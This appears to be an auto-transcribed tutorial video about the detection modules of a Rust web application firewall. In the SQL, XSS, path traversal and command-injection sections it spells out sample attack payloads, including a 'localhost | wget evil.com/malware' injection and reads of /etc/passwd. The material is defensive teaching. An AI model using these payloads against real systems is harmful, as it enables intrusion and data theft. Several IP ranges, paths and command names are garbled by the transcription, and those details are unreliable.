Welcome back everyone, I'm Darshan, and this is part 2 of our Rust WAF series. If you haven't watched part 1, go do that first, link is in the card above and in the description. In part 1, we covered the architecture and project structure. Today we're going deep, we're breaking down every single security module in this WAF, SQL Injection with 15 Regex patterns, XSS Detection, Path Traversal, Command Injection, Rate Limiting, IP Filtering, Bot Detection, Body Inspection. And the best part? I'm going to show you actual attack payloads and explain exactly how our WAF catches each one. This is the video that turns this project from interesting Rust code into holy crap that actually stops real attacks. Let's dive in. Remember, the full source code is on GitHub, aram devhub/Pingora WAF. You should have it open while watching this video. And if this series is helping you, subscribe and drop a like. It helps the algorithm show this to other developers. Let's start with the biggest one, SQL Injection. It's been around since the 90s and it's still the #1 web vulnerability. OWASP ranks it at the top of their list almost every year. Why? Because it's devastatingly simple. An attacker puts SQL code into an input field, a URL parameter, or a header. If your backend doesn't sanitize that input, the SQL gets executed directly on your database. Game over. They can read your entire database, delete tables, or even take over the server. Our WAF sits in front of the backend and catches these payloads before they ever reach your application. The SQL Injection detector has 3 layers of defense. Layer 1 is URL decoding. Attackers love to encode their payloads. They'll turn a space into %20 single quotes into %27 to bypass naive filters. We decode everything first, then inspect the decoded content. You can't hide from us with encoding tricks. Layer 2 is the pattern matching engine. We use 15 compiled regex patterns that cover every major SQL injection technique. They're compiled once using the lazy static pattern and reused for every request, no recompilation overhead. Layer 3 is safe header exemption. HTTP requests have dozens of headers. Most of them, like accept, content type, user agent, and the various secfetch headers, are standard browser headers. Scanning them for SQL injection would create false positives and waste CPU time. We skip these safe headers and only check custom or non-standard headers. Let me walk you through the attack patterns our detector catches. This is where it gets interesting. First, union-based injection. The classic. An attacker appends union select to your query to combine their malicious query with yours. Our regex catches any combination of the word union followed by select, case insensitive. Second, select from patterns. Any attempt to write a standalone select query with a from clause gets flagged. Third, boolean-based injection. This is the sneaky one. An attacker adds r1 equals 1 or and1 equals 1 to make a where clause always true. Our regex catches r1 followed by a number, equals sign, and another number. Fourth, string-based boolean injection. Same idea but with strings. Like single quote or single quote 1 single quote 1 single quote 1 1. We catch that too. Fifth, data manipulation. Insert into, delete from, drop table, drop database, update. If someone's trying to modify your data through a URL parameter, we catch it. Sixth, statement termination. Attackers close one SQL statement with a semicolon and start another. Semicolon followed by drop, delete, update, or insert. Seventh, comment-based injection. The double dash comment trick. Attackers terminate your SQL with a double dash so the rest of your query is treated as a comment. We detect semicolons followed by double dashes and standalone double dash sequences. Eighth, stored procedure execution, EXEC and execute followed by parentheses and the XP underscore and SP underscore prefixes used in SQL Server stored procedures. Ninth, time-based blind injection. When attackers can't see the query output directly, they use time delays. Benchmark, sleep, and wait for delay. If the response takes 5 seconds longer, they know their injection worked. We block these before they even reach the database. 10th, hex encoding bypass. Attackers encode strings as hexadecimal to bypass filters. We catch hex sequences that look like 0x followed by hex characters. That's 15 patterns covering virtually every SQL injection technique documented by OWASP. And because they're regex-based, you can add new patterns without changing any other code. Just add a line to the patterns array. The detector doesn't just check the URL, it has 3 inspection points. First, the URI. This catches attacks in query parameters like /API/users?ID equals 1 single quote OR1 equals 1 single quote OR1 equals 1. This is the most common attack vector. Second, request headers. Custom headers can carry payloads too. If an application reads from custom headers like X user input, attackers can inject through there. We scan all non-safe headers. Third, the request body. Post requests carry data in the body. Form submissions, JSON payloads, anything. We decode the body bytes to text and run the same pattern matching. This catches injection in login forms, search fields, API payloads. Every check returns a security violation with the threat type set to SQL_injection, threat level set to critical, a description explaining what was found and where, and the blocked flag based on the configuration. Let me give you some real examples that our detector blocks. Query parameter attack, /API/users?ID equals 1 space or 1 equals 1, blocked. Boolean injection detected. Union attack, /API/search?, Q equals 1 single quote, union sect, *from, passwords. Blocked. Union-based injection detected. Login bypass, /login?, user equals admin single quote, ~& pass equals anything. Blocked. Comment injection detected. Body attack, a post request body with username set to single quote drop table users ; blocked. Statement termination with destructive command. Each one triggers a 403 response and increments the Prometheus blocked requests counter with the reason SQL injection. Next up, XSS, cross-site scripting. This is the second most common web vulnerability. The idea is simple. An attacker injects JavaScript into a page that other users see. When their browser renders the page, the injected script executes. It can steal session cookies, redirect users to phishing sites, modify page content, or even mine cryptocurrency using the victim's CPU. Our XSS detector uses the same architecture as the SQL injection detector. Regex patterns with URL decoding and safe header exemptions. We detect 10+ XSS patterns across 4 categories. Category 1, script tags, the most basic XSS attack, opening script tags and closing script tags. Our Regex catches script tags regardless of attributes or spacing. Category 2, event handlers. HTML elements can have event handler attributes like onload, onError, onClick, onMouseOver. Attackers inject these into image tags, body tags, input fields. Our Regex catches any attribute starting with on followed by letters and an equals sign. Category 3, JavaScript protocol. The JavaScript protocol can be used in href attributes, iframe sources, and form actions. Our Regex catches JavaScript followed by any word character. Category 4, dangerous HTML elements. Certain HTML tags are inherently dangerous. Iframes can load external content. Object and embed tags can load plugins. Image tags with event handlers execute JavaScript. Body tags with onload fire when the page loads. We catch all of these. We also detect JavaScript functions like eval, alert and expression, and data URLs with text/HTML content type, which can contain embedded scripts. Just like SQL injection, we check 3 places. The URI. Attackers can put XSS payloads in query parameters. If your application reflects those parameters in the page without sanitization, the script executes. Non-safe headers. Custom headers that get reflected in responses. The request body. Form submissions, JSON payloads, any user input that might get stored and later displayed to other users. Here are real payloads our detector blocks. Basic script injection, a script tag with alert XSS inside. Blocked. Script tag detected. Image tag attack, an image tag with src equals x and onError equals alert 1. Blocked. Event handler and image tag detected. Iframe injection, an iframe with src equals JavaScript alert 1. Blocked. JavaScript protocol and iframe detected. Body onload, a body tag with onload equals alert 1. Blocked. Event handler and body tag detected. Encoded attack, the attack might be URL encoded, but we decode first, so the encoded version of a script tag still gets caught. Our approach catches the vast majority of XSS attacks. Could a determined attacker craft a payload that evades detection? Maybe. Security is always a cat-and-mouse game, but we cover every common technique, and adding new patterns is trivial. Path traversal, also called directory traversal, is when an attacker manipulates file paths to access files outside the intended directory. The classic attack is ... You keep going up directories until you reach the root, then navigate to sensitive files. Like /API/files path equals ... /etc//passwasdu. Our path traversal detector checks for several patterns. First, raw ... sequences, simple but catches most attempts. Second, encoded variants, %2e for dots, %2e for slashes. Attackers encode these to bypass basic filters. We decode before checking. Third, double encoding, %252e for a encoded followed by 2e. Yes, attackers actually try double encoding. Fourth, absolute paths to sensitive files. Direct access attempts to files like /etc/passwd/etc/shadow, /windows/system32.htaccess.git/config, and other known sensitive files and directories. The detector is surprisingly thorough. It checks the URI, request headers, and body, just like SQL and XSS. Same trait, same pattern, different regex rules. Command injection is when an attacker injects operating system commands through your application. If your backend passes user input to a shell without sanitization, the attacker can execute arbitrary commands on your server. This is critical severity. Unlike SQL injection, which targets your database, command injection gives the attacker a shell on your server. Full control. Our command injection detector catches several categories of shell operators and dangerous commands. Shell operators, semicolons to chain commands, pipe operators for command piping, double ampersands for conditional execution, $parentheses for command substitution, and backticks for command substitution and older shell syntax. Dangerous commands, rm for file deletion, wget and curl for downloading files, cmod and chown for changing permissions, and cat/etc/passwt for reading sensitive files. The patterns use word boundaries to avoid false positives. We don't just match a semicolon anywhere. We match a semicolon followed by what looks like a command. Path traversal /API/download file equals ... /atch9/passwith10. Blocked. Encoded traversal, the same attack but with %encoded dots and slashes. Still blocked because we decode first. Command injection /API/ping host equals google.com cat /h2/h2/passwd. Blocked. Semicolon followed by command detected. Pipeline injection, an input field with value localhost pipe wget evil.com/malware. Blocked. Pipe operator with dangerous command. Rate limiting prevents abuse. Without it, an attacker can send thousands of requests per second to brute force passwords, scrape your content, or overwhelm your backend. Our rate limiter uses a sliding window algorithm with per IP tracking. Here's how it works conceptually. Each IP gets an entry in a DashMap. The entry tracks how many requests that IP has made and when the current window started. When a request arrives, we look up the IP. If the window hasn't expired, we increment the counter. If the counter exceeds the maximum, we return 429, too many requests. If the window has expired, we reset the counter and start a new window. The default config allows 1,000 requests per 60-second window. That's about 17 requests per second per IP. Enough for any normal user, but way below what an attacker needs for brute force attacks. DashMap is a concurrent hash map that uses sharding internally. It divides the map into multiple segments, each with its own lock. Different IPs map to different segments, so most operations don't contend with each other. Compared to a regular hash map wrapped in a mutex, DashMap gives us significantly better throughput under high concurrency. With 15,000 requests per second hitting the rate limiter from hundreds of different IPs, lock contention would murder our performance with a regular mutex. DashMap handles it like a champ. We also run a cleanup task every 5 minutes in a background thread. It iterates through the DashMap and removes expired entries. This prevents memory from growing indefinitely as unique IPs come and go. The rate limit config has 3 settings. Enable toggles the entire feature. Max request sets the threshold per window. Window sack sets the window duration. For development, you might want 500 requests per 60 seconds. For production, maybe 5,000 per 60 seconds. For benchmarking, you disable it entirely so it doesn't interfere with throughput numbers. The testing config included in the project has relaxed limits specifically for development and integration testing. IP filtering is your first line of defense. Before we even look at the request content, we check if this IP is allowed to talk to us. The filter supports both individual IP addresses and CIDR notation. CIDR lets you specify an entire network range with a single entry. For example, 10.0.0.0/8 covers all private IPs from 10.0.0.0 to 10.255.0, 55.su, 55.0, 55.su, 55. That's over 16 million addresses in one rule. We use the IP network crate to parse CIDR notation. When checking an IP, we test if it falls within any of the configured network ranges. The whitelist takes priority over the blacklist. If an IP matches both, the whitelist wins. This is important for scenarios where you blacklist a broad range but need to allow specific IPs within that range. In the production config, internal networks are whitelisted. 10.0.0.0/8, 17t2.16.0.0/12, and known malicious ranges are blacklisted. The bot detector examines the user agent header to identify automated clients. We maintain 2 lists. A bad bots list with patterns that match known malicious tools, things like SQL Map, the popular SQL Injection tool. Nikto, a web vulnerability scanner, various scrapers and attack tools, and a good bots list with known legitimate crawlers. Googlebot, Bingbot, Yahoo Slurp, DuckDuckBot. You don't want to block search engines from indexing your site. The bad bots list uses regex patterns for flexible matching. The good bots list uses simple string matching for performance. When a request arrives, we first check if the user agent matches any known good bot. If yes, allow it through. Then we check against the bad bot patterns. If it matches, block or log based on configuration. You can add custom bot patterns and custom good bot identifiers through the configuration. No code change is needed. You might wonder why we need both. IP filtering works at the network level. Block known bad IPs, allow known good IPs, simple. But attackers rotate IPs. They use VPNs, proxies, botnets. You can't blacklist every IP they might use. Bot detection works at the application level. It identifies the tool being used, not the source address. An attacker might use a fresh IP, but if they're running SQL Map, the user agent gives them away. Together, they create layered defense. Even if one layer misses something, the other might catch it. Security in depth. The body inspector handles requests with payloads, post requests, PUT requests, anything with a body. It has 2 responsibilities. First, enforce the size limit. The default is 1 megabyte. If a request body exceeds this, we reject it immediately. This prevents memory exhaustion attacks where someone sends a 10 gigabyte request body. Second, buffer the body for security scanning. Request bodies arrive in chunks from the network. We buffer these chunks until we have the complete body, then pass it to the SQL Injection and XSS detectors. There's an important trade-off here. We could inspect each chunk as it arrives, which would use less memory. But attacks can span chunk boundaries. The word select might be split across 2 chunks. So we buffer the full body before inspection. The size limit keeps memory usage bounded. 1 megabyte per request, with the buffer cleared after inspection. For production deployments with large file uploads, you'd increase the max body size. For API-only services with JSON payloads, 1 megabyte is more than enough. We actually check the body size in 2 places. First, in request ISTH filter, we check the content length header. If the header says the body is 10 megabytes, we reject immediately without reading a single byte. Second, in request USPER body USPER filter, we check the accumulated buffer size as chunks arrive. This catches cases where there's no content length header, which happens with chunk transfer encoding, or where the actual body size differs from the header. Belt and suspenders. Always. In Part 2 we covered every security module in the WAF. SQL injection with 15 regex patterns covering union attacks, boolean injection, comment tricks, stored procedures, time-based blind injection, and hex encoding bypasses. XSS detection with script tags, event handlers, JavaScript protocols, dangerous HTML elements, and JavaScript functions. Path traversal with ... sequences, encoded variants, and sensitive file protection. Command injection with shell operator detection, rate limiting with DashMap-based sliding windows. IP filtering with CIDR support and whitelist priority. Bot detection with good bot allow listing. And body inspection with streaming buffering and two-stage size checks. Every module implements the security rule trait. Every module is independently configurable. Every module is independently configurable. Every module can run in block mode or log-only mode. In the final video, Part 3, we bring it all to production. Docker deployment, Kubernetes manifests, Prometheus metrics and Grafana dashboards, performance benchmarking with RK, running the security test suites, and production best practices. We'll actually run the WAF, hit it with test attacks, and watch the metrics in real time. Subscribe so you don't miss Part 3. Drop a comment telling me which detector surprised you the most. Join the Discord for discussions. GitHub link is in the description. Star the repo. Fork it. Build on it. Thanks for watching. I'm Darshan. Keep building, keep learning. See you in Part 3. Peace.